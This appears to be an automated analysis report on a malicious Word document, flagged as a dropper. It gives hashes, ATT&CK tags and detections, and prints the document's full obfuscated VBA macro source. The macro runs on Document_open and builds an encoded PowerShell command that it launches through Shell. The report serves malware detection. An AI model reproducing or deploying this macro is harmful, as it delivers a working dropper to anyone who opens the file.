Office (OLE) malware analysis — malicious · 75d22b7c1c9eb656

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-06-13 21:11:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: a495f432c6337b702dc53d931d5d1b93 SHA-1: eaa7ab5faf396bd0c7155eb4296945195575294a SHA-256: 75d22b7c1c9eb656d981ded968ecfa90d6f1a1e592521e0cbafd0f8124ff78c2

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro that is automatically executed upon opening (Document_Open). This macro utilizes the Shell() function to execute arbitrary commands, indicating a dropper or downloader functionality. The ClamAV heuristic also identifies it as 'Doc.Dropper.Agent-6592561-0', reinforcing its role as a malware dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6592561-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6592561-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

jMinqP = CDbl(UKqERJ)
qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010)
RVsGl = jJjVq

Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_open()
On Error Resume Next
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11913 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11913 bytes
SHA-256: `806b6ac6a9f6e95cd33bcc11b732cfcce821a6a0f864f212b35d9340434eda1e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HrotVrdd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function qYECDJVzi() On Error Resume Next rdSYFj = MUzvuD ajLInv = Tan(71383) mUzbOz = CDbl(zZnohW * CDbl(jfGzN + Int(PNrIDU * Rnd(75886)) * YPMOl * Log(82358 * rKLjnq - EfkXKR + Fix(51)))) prwjRT = Tan(48743) UuQavX = LYfKW oXuKob = CDbl(aavfT) OWomd = QvFKc iYOhU = Tan(44741) wlVzhG = CDbl(vQRQr * CDbl(nQtkLs + Int(IvdwFi * Rnd(93319)) * HNGODf * Log(46009 * Najawb - zFwCp + Fix(51)))) WKtRBV = Tan(4702) fKiScj = jsJcGI WrDKc = CDbl(DKCoEP) jdQVnD = DHzZGq DNwBKV = Tan(59719) OzYoN = CDbl(ihbDTD * CDbl(zFmuu + Int(pbBBHt * Rnd(72338)) * oCijBu * Log(5784 * zdVIEL - CMBkD + Fix(51)))) wUDfGB = Tan(47607) IJZmud = zoFJiG zRvbf = CDbl(fwWSJz) LZjZVV = qjbGp haBvsi = Tan(72633) KitMXw = CDbl(IMmtZ * CDbl(zVUXQS + Int(JzzFV * Rnd(15943)) * twVib * Log(31706 * XwIiV - Yqznmz + Fix(51)))) XkVMK = Tan(75980) aYMovn = SwMSWm jMinqP = CDbl(UKqERJ) qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010) RVsGl = jJjVq JcIXoo = Tan(40134) zLJYP = CDbl(nNOSU * CDbl(cNLhh + Int(dUdQHr * Rnd(91225)) * Blmodz * Log(61530 * jzTkH - AHvzAY + Fix(51)))) XswcCr = Tan(41091) iNOwZ = UWUHqW hESdaw = CDbl(bZpXn) WBtBH = pzfVJd dtnMa = Tan(10585) Qtikfd = CDbl(BWMwb * CDbl(OUIoN + Int(RdrcU * Rnd(24534)) * rzUrww * Log(24351 * vkOChz - JzozZ + Fix(51)))) SUqqI = Tan(90285) UTkum = QOTroX HYQKY = CDbl(lCjfOw) End Function Private Sub Document_open() On Error Resume Next iXTDd = MAcTaw oZfiAq = Tan(6159) jzjwE = CDbl(dznjcn * CDbl(ALXCfX + Int(OqwRqI * Rnd(76237)) * OqXNY * Log(56051 * avhwN - CqqrQ + Fix(51)))) rBdaoC = Tan(7154) rlbUi = VLzFZ pDSGvo = CDbl(iwIOP) hTWdb = YzUuh PvDlQi = Tan(21419) AlAPBG = CDbl(shjqz * CDbl(fjtWzj + Int(DuaYO * Rnd(95510)) * ilWrFY * Log(95333 * dvnjK - SmzcZk + Fix(51)))) UfdWNH = Tan(47576) FCziNW = kIcvoM LbBEN = CDbl(GLskY) qYECDJVzi STlfz = LaFsA OFsVsR = Tan(47764) pRiuIr = CDbl(nzjjM * CDbl(PJBSWs + Int(Wljdz * Rnd(66524)) * rZhWC * Log(77241 * HwXwM - GkWjn + Fix(51)))) nhwKI = Tan(67060) YUIMdU = rBlPA sTDhE = CDbl(aSSOQM) vCDPT = mioWG XurvOZ = Tan(75936) JASYk = CDbl(oYIrio * CDbl(NZfaXA + Int(ZadSEz * Rnd(20468)) * XJNPJ * Log(58379 * WbSLhl - uDUPh + Fix(51)))) bHIQV = Tan(28961) jCDHL = GKjZz jXAUnV = CDbl(AziTf) End Sub Attribute VB_Name = "PEqQAwtuhzzaw" Function hUMrYzk() On Error Resume Next uzdHU = Tan(8539) zWCfCa = Tan(49319) MwZqzs = XOmED iKNrkW = CDbl(njhtJr * CDbl(KPdQwE + Int(jKFZR * Rnd(59846)) * qCAOr * Log(19622 * MpnSD - sSYBVD + Fix(51)))) CzHST = CDbl(KwihfS) wGvivw = OGXQI VdBJTOLqVYh = "HeLL (" + "'30t92C83F12" + "0%92K1" + "20t2" + "6A7K2" + "6t84C" + "95m77F23C8" tizpi = Tan(4230) KiqZs = Tan(88863) ONjzp = FSiGX VIvZm = CDbl(bqznN * CDbl(OFhjG + Int(olfuz * Rnd(73556)) * Vwjjca * Log(91450 * ArBjQm - Swnazi + Fix(51)))) YbKJiR = CDbl(vGWMR) nOMiUz = fvnqW YlzKHawhzB = "5m88u80A95<" + "89" + "F78G26m72m91" + "%84m9" + "4F85G87C1u" + "30F119C" + "64A74G98A78G26" + "K7t26A84m95u77u" + "23t85%88m80" + "K95u89F78F26A10" OTSiT = Tan(64524) NPECjn = Tan(85868) Qchop = qcuzBn JrjzCz = CDbl(zSpUn * CDbl(UBFsW + Int(UYYmzq * Rnd(44393)) * zjusq * Log(18850 * EYYEh - dwimvC + Fix(51)))) JkFjHf = CDbl(RQXzid) wcQqZi = YXpQN iwCzlFMfKL = "5A67%73G78" + "A95%87K20K116" + "F95G78t" + "20t109m9" + "5m88<" + "121C86m83<" + "95u84G78K1F3" + "0K83C112K94m121" rsZcwR = Tan(92002) siNPZ = Tan(16533) iGAai = zzHTuk Zmzrl = CDbl(dlChpF * CDbl(ULBnDI + Int(VNVzI * Rnd(84423)) * mBiwoK * Log(68670 * humcZ - WNOdOH + Fix(51)))) QAitz = CDbl(kYlBvw) vTTpz = tMfGp jIBszarD = "G89G26m7<26F2" + "9G82%78u7" + "8<74m0<2" + "1<21G83K95m86C" + "95<78m" + "72F8" + "5<84m20G89<" oGLWM = Tan(33044) uJETq = Tan(86964) LiuPDo = kzTOIw XMlZB = CDbl(owMJh * CDbl(JlzaTR + Int(BKDOL * Rnd(92023)) * JZMJdq * Log(53370 * qhXfSb - rpGNQ + Fix(51)))) zTwZd = CDbl(GPkDf) CQuEiZ = mpdcT ZSsAoizdVb = "85t87C21%67G8" + "9A" + "111" + "C11" jtWVM = Tan(13243) TUSAnR = Tan(49319) YOKVs = JXKKE ErtrI = CDbl(NhUfEq * CDbl(wqlwjP + Int(QBGXf * Rnd(10277)) * qPHMdh * Log(51405 * bbbrFE - qwStVD + Fix(51)))) kWLDw = CDbl(RMTbI) bXjzC = UpGla ZwoIINZ = "3C1" + "5K118" + "G21<122" + "K82C78K" + "78%74%0t" + "21G21K77F77G77" + "C20K" + "85t87" pUuipf = Tan(98517) jiXjNp = Tan(14041) EXFLfi = SXWwX UfEZYi = CDbl(DitaR * CDbl(UOzlw + Int(UohBXF * Rnd(10851)) * Bazjh * Log(24603 * OCTHp - wRkdQ + Fix(51)))) wnihU = CDbl(bJclM) TWrFP = Jiadcr qnjHBFFji = "<79C7" + "2t" + "87<91" + "t81F83G84C91" + "u20A84G9" + "5G7" TsjDUF = Tan(22399) RPjGs = Tan(14805) FWfvh = JZkwWh XiSOj = CDbl(KWjzZ * CDbl(GaCCrD + Int(iLLPRf * Rnd(76769)) * rmjliz * Log(13585 * jzVXow - BphjRL + Fix(51)))) BjvJT = CDbl(zOquzq) ipGaX = mWjmoz TNLqjLwi = "8m21F9" + "8<13t105%64C1" + "05<" + "89<88C21u1" + "22m82K7" + "8A78" + "C74F" + "0G21A21K1" hUMrYzk = VdBJTOLqVYh + YlzKHawhzB + iwCzlFMfKL + jIBszarD + ZSsAoizdVb + ZwoIINZ + qnjHBFFji + TNLqjLwi End Function Function DQhSDljvmoR() On Error Resume Next iwPiW = Tan(39305) SrBic = Tan(2673) WNkOp = Wwfilz ROVDI = CDbl(ZBsRnY * CDbl(MRGMMS + Int(SCJkDQ * Rnd(6638)) * FwtHDM * Log(80250 * VzWob - XiwDC + Fix(51)))) OElAr = CDbl(pwuXfU) Qwlci = vEbqoS IWzYPs = "5K14" + "A81K84A" + "81C20G72%79G" + "21<" + "15K10u121A10" + "6%77<120K64" + "<21A122C82" + "C78u78u74m" QzYziA = Tan(5974) lGGiP = Tan(70950) fhDAAD = RUHSjo nvRNBo = CDbl(wFjaAA * CDbl(wjqMIu + Int(FvNBQK * Rnd(47746)) * XCXSRa * Log(81355 * sharlE - YjwCGD + Fix(51)))) kiUOh = CDbl(DhjBIt) Kbzjzf = mZcHT AcbwR = "0u21t21t77<7" + "7K77K2" + "0<87K85u78m85" + "<67u91C64K94t2" wrfBT = Tan(4902) YuTsqm = Tan(62189) OtzYj = BMKozb RVzhwO = CDbl(PWBitu * CDbl(nPISHR + Int(lfddsT * Rnd(31146)) * HUWDB * Log(12741 * WLtXl - ZVoiQr + Fix(51)))) pTEEvi = CDbl(PjLpt) wXWXLV = MAzJl ijnXwowU = "0t83A72G2" + "1K64%76G108u" + "107%2" + "1%122F8" + "2<78<78G74K0C21" + "<21G78K72G" + "95" + "F76A85u" MJfdJ = Tan(94187) BLPoUk = Tan(97545) vYJan = KnJwqZ ADtHR = CDbl(BTffFc * CDbl(cvArq + Int(uziqr * Rnd(68864)) * XbCVM * Log(19513 * JBIVh - vzHEX + Fix(51)))) jdVVMC = CDbl(KQZQJ) jCGocH = JocoX vwIiLwiJNa = "72G89t82" + "G72m83C73K78t95" + "%84t73%95t" + "84m20K89t85K8" + "7G21m92G81F105A" + "13K83<124K11F" + "21" HzUJLk = Tan(82705) qXzsw = Tan(87913) kTHzR = CMKoD EFozEq = CDbl(mwajiv * CDbl(LzNYaW + Int(sVzVur * Rnd(21030)) * vdYziO * Log(71576 * znHOlb - uJkCHK + Fix(51)))) KzTnCw = CDbl(fRfaQ) aaboj = TKsfYq HdSaJ = "t29m20A" + "105t74F86" + "%83F" + "78C18u29K12" + "2u29C19A1<30A9" + "1m113G127G104A1" cEdWtH = Tan(43063) QWafUC = Tan(2058) alhlVm = udQiC PWdMJu = CDbl(oRzKQ * CDbl(mahAwd + Int(XwGMM * Rnd(3548)) * TPirSW * Log(89496 * zwTKH - DBdwiz + Fix(51)))) PRzIC = CDbl(ZjIsuE) TdHuwY = mdSWh ZumBO = "08A99F26t7" + "m26" + "<3" + "0<92t83%120" + "F92u12" + "0%2" + "0<84C95t6" + "6m78G18A11" + "K22<26G15A1" DQhSDljvmoR = IWzYPs + AcbwR + ijnXwowU + vwIiLwiJNa + HdSaJ + ZumBO End Function Function KhzDtEKMFr() On Error Resume Next zJmOn = Tan(63810) qKFUZ = Tan(27627) RwrOXV = SmJuu vABTwk = CDbl(UBYmB * CDbl(FwEOi + Int(TjfErG * Rnd(25968)) * PvqdIM * Log(97822 * FprIj - tWJzd + Fix(51)))) DPwJMi = CDbl(IYLvi) hjiTC = qdRUD XBvPdmQUW = "1<10t1" + "1t9m3G19F1K30%" + "120<87%117%73F" + "112F87F26%" + "7%26m30t9" + "5K84G76G0C" RrFaI = Tan(30428) KlGJbp = Tan(52308) wdNdAi = ErVbR wSXrSd = CDbl(QFBPi * CDbl(QBPkF + Int(NWGii * Rnd(85389)) * WZRzjb * Log(80000 * noljX - JilHQw + Fix(51)))) OrjpzW = CDbl(szGUn) vrIjfa = sUKOSn KmWDWjwJX = "78m95<87m7" + "4G26<17%26C" + "29K102K29t2" + "6A17C26G30G91" + "m113" + "<127t104K108" + "%9" FszpAZ = Tan(29643) tEiLYY = Tan(22427) FDjwbk = ILIhKZ CDndca = CDbl(KVWWIX * CDbl(dCKnh + Int(cdnhIh * Rnd(29423)) * OnMppo * Log(87188 * QEjwwA - oYwYhX + Fix(51)))) UvLsw = CDbl(KjSjJn) KvEwk = qQffm VBruYajs = "9%26" + "C17u26<29G20" + "F95A66<95%29K1" + "u92K" + "85G72<95t91C89%" + "82C18<30A91" + "F109u" KsjWc = Tan(58034) TsznUa = Tan(21006) KKhJB = vNnTo NrZoPz = CDbl(mdhWz * CDbl(oTvpMa + Int(PwsWY * Rnd(42458)) * iTIbW * Log(65100 * iIOfKN - BJYiLn + Fix(51)))) QzCQt = CDbl(aSUGzS) onGELd = doYjDA YzWYcZpLc = "64" + "<80G96%77" + "u26G83%84<2" + "6<30<83K112A94t" + "121A89G19m65<7" + "8A72F67A65A30K1" + "19m64u74G98" + "%78K" + "20A126u85A77" GOzqt = Tan(32344) iNYaZ = Tan(8693) DzicuS = tMLYZi tbtzLZ = CDbl(QjLdf * CDbl(DKSCr + Int(BFOFwB * Rnd(43064)) * kfuizA * Log(11344 * HUYPA - iUtkdw + Fix(51)))) fVwzof = CDbl(kojdiI) DFNJLP = hAioS XqCUNUoLwnY = "K84A86<85u" + "91F94C12" + "4G83<86G9" + "5t18t30G91F1" + "09K64u80G96K7" + "7C20C110<8" + "5%105%78m72" + "t83t84G93C18m19" + "u22%26m" TiDIjk = Tan(82025) QzoFkc = Tan(77339) NTRJE = qnBqAZ TOzwB = CDbl(JlZPwG * CDbl(qsYuf + Int(SaDBZS * Rnd(65999)) * zEZkF * Log(51254 * dZGlbC - mBLYsY + Fix(51)))) MZjTX = CDbl(jzirf) XaaVzt = MGwocD VwvrSuRFwEA = "30F12" + "0u87K117" + "t73A112C87C1" + "9u1K105K78C91m" + "72K78C23%" + "106F72A85<89F9" + "5K73u73A26u" + "30G1" + "20F87%117" + "A73K112A87G1C8" fovXiP = Tan(43768) YfWVc = Tan(48937) DwFDi = uFBPdF cAQuE = CDbl(uCOWYG * CDbl(zdKiC + Int(qLAGl * Rnd(8210)) * NYiAJT * Log(24890 * wfFbX - vFwqHw + Fix(51)))) bufqIa = CDbl(UOMFt) INNjFI = SFBjhM hPliMHUEV = "8u72A" + "95m91u81C1F7" + "1u89" + "%91A" + "78<89t82<65m77" ETmDz = Tan(92777) ikmdfE = Tan(81122) ckGmrk = BjoOpI ubppU = CDbl(jblafC * CDbl(Ksmilh + Int(DqjOf * Rnd(35127)) * UVURl * Log(50707 * DGuzIf - ObtFX + Fix(51)))) CEsbK = CDbl(jPFRJ) UkZkP = ZlkdC Aikkadwh = "C72K83A" + "78G95G23u8" + "2C85A73C78F26" + "C30K1" JKzkXX = Tan(81646) SKAiR = Tan(34602) lwVojL = jzwJzD uPzhv = CDbl(WuUNp * CDbl(SCjYO + Int(zrEDn * Rnd(14472)) * ZwVFb * Log(62261 * EzNDM - nzvuD + Fix(51)))) LtGrbq = CDbl(WTBps) YzzNSm = wEIKk lZOcRrw = "01t20A127G66G89" + "K95C74u78A8" + "3<85K84t20" + "C119%95<73A73m9" UaowD = Tan(32360) OZOzhl = Tan(90299) CnzlRt = ZkpCL LivrL = CDbl(CLzzrY * CDbl(uzFEHH + Int(tniTFp * Rnd(69257)) * TDEoA * Log(49792 * uSGWp - jOtdCd + Fix(51)))) YAclWL = CDbl(susDYS) LqVbWK = jtFKC EdjBt = "1u93K95" + "G1<71<71'-sPLi" + "T'F" + "'-sPLI" + "t '<'-splIT" + " '" KhzDtEKMFr = XBvPdmQUW + KmWDWjwJX + VBruYajs + YzWYcZpLc + XqCUNUoLwnY + VwvrSuRFwEA + hPliMHUEV + Aikkadwh + lZOcRrw + EdjBt End Function Function UaQapXtui() On Error Resume Next mVooOI = Tan(78859) zsOGl = Tan(67956) HuHsSd = jcuswB YRnqM = CDbl(XRzPnj * CDbl(smzfm + Int(pXNIw * Rnd(56613)) * nkYFkO * Log(46685 * ufFXt - LdifCk + Fix(51)))) LJqNaw = CDbl(tuiYLJ) iuqUzi = oTAai MmjozAFw = "%'-S" + "plit'a' -S" + "PL" + "iT 'm' -SPlIT '" + "T'-spLIt 'k'" BaGrK = Tan(95692) kQVFj = Tan(25440) kXTtI = EcHwM ujVqL = CDbl(chwUiz * CDbl(JdITb + Int(OlfzZR * Rnd(8443)) * zcPSR * Log(24242 * pkAOX - GoSpo + Fix(51)))) acOivZ = CDbl(icEjC) VOKSBY = jAiZfo XlOYwE = "-sPliT'g'-s" + "PLiT'" + "u' -SPlI" + "T'C'" + "\|F" + "oReaCH-objEC" + "T{[CH" + "AR] ($_-bXOr" btdMl = Tan(88848) kNDjt = Tan(70679) SbFBRi = DScFA mncTdH = CDbl(iGtFS * CDbl(CaKLDz + Int(Ubhdwz * Rnd(85408)) * DOordN * Log(51340 * IuZcj - wbdTr + Fix(51)))) KGwUd = CDbl(VirFO) UjmXa = EpQki wbHmTbNjT = Chr(34) + "0x3a" + Chr(34) + ")" + " }) -jOiN''\|&" + " ( $EnV:ComSpE" + "C[4,15,25]-JOin" EBAsH = Tan(44959) HTPJkb = Tan(11799) nYLCik = NVcdf ZzVrMi = CDbl(qzhAw * CDbl(VvFUGd + Int(GVLrr * Rnd(83555)) * JtvVjl * Log(1882 * WuSYtr - ziNLja + Fix(51)))) liAVA = CDbl(zCLRN) zQOKZw = KWGWP UzsOXpjAo = "'')" UaQapXtui = MmjozAFw + XlOYwE + wbHmTbNjT + UzsOXpjAo End Function

SHA-256: 806b6ac6a9f6e95cd33bcc11b732cfcce821a6a0f864f212b35d9340434eda1e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HrotVrdd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qYECDJVzi()
On Error Resume Next
rdSYFj = MUzvuD
ajLInv = Tan(71383)
mUzbOz = CDbl(zZnohW * CDbl(jfGzN + Int(PNrIDU * Rnd(75886)) * YPMOl * Log(82358 * rKLjnq - EfkXKR + Fix(51))))
prwjRT = Tan(48743)
UuQavX = LYfKW
oXuKob = CDbl(aavfT)
OWomd = QvFKc
iYOhU = Tan(44741)
wlVzhG = CDbl(vQRQr * CDbl(nQtkLs + Int(IvdwFi * Rnd(93319)) * HNGODf * Log(46009 * Najawb - zFwCp + Fix(51))))
WKtRBV = Tan(4702)
fKiScj = jsJcGI
WrDKc = CDbl(DKCoEP)
jdQVnD = DHzZGq
DNwBKV = Tan(59719)
OzYoN = CDbl(ihbDTD * CDbl(zFmuu + Int(pbBBHt * Rnd(72338)) * oCijBu * Log(5784 * zdVIEL - CMBkD + Fix(51))))
wUDfGB = Tan(47607)
IJZmud = zoFJiG
zRvbf = CDbl(fwWSJz)
LZjZVV = qjbGp
haBvsi = Tan(72633)
KitMXw = CDbl(IMmtZ * CDbl(zVUXQS + Int(JzzFV * Rnd(15943)) * twVib * Log(31706 * XwIiV - Yqznmz + Fix(51))))
XkVMK = Tan(75980)
aYMovn = SwMSWm
jMinqP = CDbl(UKqERJ)
qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010)
RVsGl = jJjVq
JcIXoo = Tan(40134)
zLJYP = CDbl(nNOSU * CDbl(cNLhh + Int(dUdQHr * Rnd(91225)) * Blmodz * Log(61530 * jzTkH - AHvzAY + Fix(51))))
XswcCr = Tan(41091)
iNOwZ = UWUHqW
hESdaw = CDbl(bZpXn)
WBtBH = pzfVJd
dtnMa = Tan(10585)
Qtikfd = CDbl(BWMwb * CDbl(OUIoN + Int(RdrcU * Rnd(24534)) * rzUrww * Log(24351 * vkOChz - JzozZ + Fix(51))))
SUqqI = Tan(90285)
UTkum = QOTroX
HYQKY = CDbl(lCjfOw)
End Function
Private Sub Document_open()
On Error Resume Next
iXTDd = MAcTaw
oZfiAq = Tan(6159)
jzjwE = CDbl(dznjcn * CDbl(ALXCfX + Int(OqwRqI * Rnd(76237)) * OqXNY * Log(56051 * avhwN - CqqrQ + Fix(51))))
rBdaoC = Tan(7154)
rlbUi = VLzFZ
pDSGvo = CDbl(iwIOP)
hTWdb = YzUuh
PvDlQi = Tan(21419)
AlAPBG = CDbl(shjqz * CDbl(fjtWzj + Int(DuaYO * Rnd(95510)) * ilWrFY * Log(95333 * dvnjK - SmzcZk + Fix(51))))
UfdWNH = Tan(47576)
FCziNW = kIcvoM
LbBEN = CDbl(GLskY)
qYECDJVzi
STlfz = LaFsA
OFsVsR = Tan(47764)
pRiuIr = CDbl(nzjjM * CDbl(PJBSWs + Int(Wljdz * Rnd(66524)) * rZhWC * Log(77241 * HwXwM - GkWjn + Fix(51))))
nhwKI = Tan(67060)
YUIMdU = rBlPA
sTDhE = CDbl(aSSOQM)
vCDPT = mioWG
XurvOZ = Tan(75936)
JASYk = CDbl(oYIrio * CDbl(NZfaXA + Int(ZadSEz * Rnd(20468)) * XJNPJ * Log(58379 * WbSLhl - uDUPh + Fix(51))))
bHIQV = Tan(28961)
jCDHL = GKjZz
jXAUnV = CDbl(AziTf)
End Sub


Attribute VB_Name = "PEqQAwtuhzzaw"
Function hUMrYzk()
On Error Resume Next
uzdHU = Tan(8539)
zWCfCa = Tan(49319)
MwZqzs = XOmED
iKNrkW = CDbl(njhtJr * CDbl(KPdQwE + Int(jKFZR * Rnd(59846)) * qCAOr * Log(19622 * MpnSD - sSYBVD + Fix(51))))
CzHST = CDbl(KwihfS)
wGvivw = OGXQI
VdBJTOLqVYh = "HeLL  (" + "'30t92C83F12" + "0%92K1" + "20t2" + "6A7K2" + "6t84C" + "95m77F23C8"
tizpi = Tan(4230)
KiqZs = Tan(88863)
ONjzp = FSiGX
VIvZm = CDbl(bqznN * CDbl(OFhjG + Int(olfuz * Rnd(73556)) * Vwjjca * Log(91450 * ArBjQm - Swnazi + Fix(51))))
YbKJiR = CDbl(vGWMR)
nOMiUz = fvnqW
YlzKHawhzB = "5m88u80A95<" + "89" + "F78G26m72m91" + "%84m9" + "4F85G87C1u" + "30F119C" + "64A74G98A78G26" + "K7t26A84m95u77u" + "23t85%88m80" + "K95u89F78F26A10"
OTSiT = Tan(64524)
NPECjn = Tan(85868)
Qchop = qcuzBn
JrjzCz = CDbl(zSpUn * CDbl(UBFsW + Int(UYYmzq * Rnd(44393)) * zjusq * Log(18850 * EYYEh - dwimvC + Fix(51))))
JkFjHf = CDbl(RQXzid)
wcQqZi = YXpQN
iwCzlFMfKL = "5A67%73G78" + "A95%87K20K116" + "F95G78t" + "20t109m9" + "5m88<" + "121C86m83<" + "95u84G78K1F3" + "0K83C112K94m121"
rsZcwR = Tan(92002)
siNPZ = Tan(16533)
iGAai = zzHTuk
Zmzrl = CDbl(dlChpF * CDbl(ULBnDI + Int(VNVzI * Rnd(84423)) * mBiwoK * Log(68670 * humcZ - WNOdOH + Fix(51))))
QAitz = CDbl(kYlBvw)
vTTpz = tMfGp
jIBszarD = "G89G26m7<26F2" + "9G82%78u7" + "8<74m0<2" + "1<21G83K95m86C" + "95<78m" + "72F8" + "5<84m20G89<"
oGLWM = Tan(33044)
uJETq = Tan(86964)
LiuPDo = kzTOIw
XMlZB = CDbl(owMJh * CDbl(JlzaTR + Int(BKDOL * Rnd(92023)) * JZMJdq * Log(53370 * qhXfSb - rpGNQ + Fix(51))))
zTwZd = CDbl(GPkDf)
CQuEiZ = mpdcT
ZSsAoizdVb = "85t87C21%67G8" + "9A" + "111" + "C11"
jtWVM = Tan(13243)
TUSAnR = Tan(49319)
YOKVs = JXKKE
ErtrI = CDbl(NhUfEq * CDbl(wqlwjP + Int(QBGXf * Rnd(10277)) * qPHMdh * Log(51405 * bbbrFE - qwStVD + Fix(51))))
kWLDw = CDbl(RMTbI)
bXjzC = UpGla
ZwoIINZ = "3C1" + "5K118" + "G21<122" + "K82C78K" + "78%74%0t" + "21G21K77F77G77" + "C20K" + "85t87"
pUuipf = Tan(98517)
jiXjNp = Tan(14041)
EXFLfi = SXWwX
UfEZYi = CDbl(DitaR * CDbl(UOzlw + Int(UohBXF * Rnd(10851)) * Bazjh * Log(24603 * OCTHp - wRkdQ + Fix(51))))
wnihU = CDbl(bJclM)
TWrFP = Jiadcr
qnjHBFFji = "<79C7" + "2t" + "87<91" + "t81F83G84C91" + "u20A84G9" + "5G7"
TsjDUF = Tan(22399)
RPjGs = Tan(14805)
FWfvh = JZkwWh
XiSOj = CDbl(KWjzZ * CDbl(GaCCrD + Int(iLLPRf * Rnd(76769)) * rmjliz * Log(13585 * jzVXow - BphjRL + Fix(51))))
BjvJT = CDbl(zOquzq)
ipGaX = mWjmoz
TNLqjLwi = "8m21F9" + "8<13t105%64C1" + "05<" + "89<88C21u1" + "22m82K7" + "8A78" + "C74F" + "0G21A21K1"
hUMrYzk = VdBJTOLqVYh + YlzKHawhzB + iwCzlFMfKL + jIBszarD + ZSsAoizdVb + ZwoIINZ + qnjHBFFji + TNLqjLwi
End Function
Function DQhSDljvmoR()
On Error Resume Next
iwPiW = Tan(39305)
SrBic = Tan(2673)
WNkOp = Wwfilz
ROVDI = CDbl(ZBsRnY * CDbl(MRGMMS + Int(SCJkDQ * Rnd(6638)) * FwtHDM * Log(80250 * VzWob - XiwDC + Fix(51))))
OElAr = CDbl(pwuXfU)
Qwlci = vEbqoS
IWzYPs = "5K14" + "A81K84A" + "81C20G72%79G" + "21<" + "15K10u121A10" + "6%77<120K64" + "<21A122C82" + "C78u78u74m"
QzYziA = Tan(5974)
lGGiP = Tan(70950)
fhDAAD = RUHSjo
nvRNBo = CDbl(wFjaAA * CDbl(wjqMIu + Int(FvNBQK * Rnd(47746)) * XCXSRa * Log(81355 * sharlE - YjwCGD + Fix(51))))
kiUOh = CDbl(DhjBIt)
Kbzjzf = mZcHT
AcbwR = "0u21t21t77<7" + "7K77K2" + "0<87K85u78m85" + "<67u91C64K94t2"
wrfBT = Tan(4902)
YuTsqm = Tan(62189)
OtzYj = BMKozb
RVzhwO = CDbl(PWBitu * CDbl(nPISHR + Int(lfddsT * Rnd(31146)) * HUWDB * Log(12741 * WLtXl - ZVoiQr + Fix(51))))
pTEEvi = CDbl(PjLpt)
wXWXLV = MAzJl
ijnXwowU = "0t83A72G2" + "1K64%76G108u" + "107%2" + "1%122F8" + "2<78<78G74K0C21" + "<21G78K72G" + "95" + "F76A85u"
MJfdJ = Tan(94187)
BLPoUk = Tan(97545)
vYJan = KnJwqZ
ADtHR = CDbl(BTffFc * CDbl(cvArq + Int(uziqr * Rnd(68864)) * XbCVM * Log(19513 * JBIVh - vzHEX + Fix(51))))
jdVVMC = CDbl(KQZQJ)
jCGocH = JocoX
vwIiLwiJNa = "72G89t82" + "G72m83C73K78t95" + "%84t73%95t" + "84m20K89t85K8" + "7G21m92G81F105A" + "13K83<124K11F" + "21"
HzUJLk = Tan(82705)
qXzsw = Tan(87913)
kTHzR = CMKoD
EFozEq = CDbl(mwajiv * CDbl(LzNYaW + Int(sVzVur * Rnd(21030)) * vdYziO * Log(71576 * znHOlb - uJkCHK + Fix(51))))
KzTnCw = CDbl(fRfaQ)
aaboj = TKsfYq
HdSaJ = "t29m20A" + "105t74F86" + "%83F" + "78C18u29K12" + "2u29C19A1<30A9" + "1m113G127G104A1"
cEdWtH = Tan(43063)
QWafUC = Tan(2058)
alhlVm = udQiC
PWdMJu = CDbl(oRzKQ * CDbl(mahAwd + Int(XwGMM * Rnd(3548)) * TPirSW * Log(89496 * zwTKH - DBdwiz + Fix(51))))
PRzIC = CDbl(ZjIsuE)
TdHuwY = mdSWh
ZumBO = "08A99F26t7" + "m26" + "<3" + "0<92t83%120" + "F92u12" + "0%2" + "0<84C95t6" + "6m78G18A11" + "K22<26G15A1"
DQhSDljvmoR = IWzYPs + AcbwR + ijnXwowU + vwIiLwiJNa + HdSaJ + ZumBO
End Function
Function KhzDtEKMFr()
On Error Resume Next
zJmOn = Tan(63810)
qKFUZ = Tan(27627)
RwrOXV = SmJuu
